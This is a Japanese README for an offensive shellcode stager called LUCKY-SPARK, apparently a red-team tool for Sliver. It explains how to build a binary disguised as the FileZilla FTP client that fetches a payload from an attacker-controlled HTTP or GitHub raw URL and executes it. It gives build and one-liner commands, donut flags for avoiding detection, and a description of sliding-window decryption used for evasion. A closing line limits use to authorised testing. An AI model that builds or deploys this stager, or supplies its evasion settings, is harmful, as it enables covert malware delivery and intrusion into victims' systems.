
シェルコードペイロードをHTTP/HTTPS(Sliverなど)やGitHub Rawでステージングするために設計されたステルスなステージャ。
⟪ LUCKY-SPARK ⟫ は、HTTP/HTTPS(Sliver や GitHub の raw など)でステージングされたシェルコードペイロード向けに設計されたステージャーです。最新の難読化と回避手法(スライディングウィンドウによるペイロードのジャストインタイム復号、CPU 命令パッチなど)を使用しています。デフォルトでは、FileZilla FTP クライアントを装った実行ファイルを作成します。
リポジトリをクローンまたはダウンロードし、システムに make と mingw がインストールされていることを確認してください。
git clone <repository_url>
cd LUCKY-SPARK
バイナリ作成スクリプトを実行します。
./luckySpark.sh
ステージングされたペイロードの URL と、オプションの User-Agent の入力を求められます。

スクリプトに組み込めるように一行で実行できます:
./luckySpark.sh -u https://github.com/GITHUBNAME/PAYLOADREPO/raw/refs/heads/main/PAYLOAD.bin -a "Mozilla/5.0"

donut または Sliver(donut を使用)を使用する場合、ペイロード作成には以下のフラグをお勧めします:
donut.exe -i examplePayload.exe -a 2 -e 1 -z 1 -b 1 -o payload.bin
これにより、donut による疑わしい動作やフラグ付き動作を回避できます。特に皮肉なことに、donut の回避自体が非常にフラグされやすいです。
これにより filezilla.exe というバイナリが作成され、実行時にペイロードを取得して実行します。
このステージャーは Sliver での使用を想定して設計されています。 ここで説明されているように Sliver ペイロードをステージングします Sliver Staging ペイロードを暗号化しないでください。
しかし、HTTP/HTTPS ベースのステージング方法ならどれでも動作します。
python3 -m http.server など
または、GitHub.com の公開リポジトリにアップロードされたペイロード。
このステージャーは meterpreter ステージングプロトコルをサポートしていません。
Step 1: RIP hits Page 0 and Page 0 gets decrypted
Pages: [ D | E | E | ... ]
RIP -> ^
Step 2: RIP hits Page 1 and Page 1 gets decrypted
Pages: [ D | D | E | ... ]
RIP -> ^
Step 3: RIP hits Page 2 and Page 2 gets decrypted. Page 0 gets encrypted
Pages: [ E | D | D | ... ]
RIP -> ^
LUCKY-SPARK は教育、研究、および許可されたペネトレーションテストのみを目的としています。許可なくシステムに対して不正に使用することは違法であり、非倫理的です。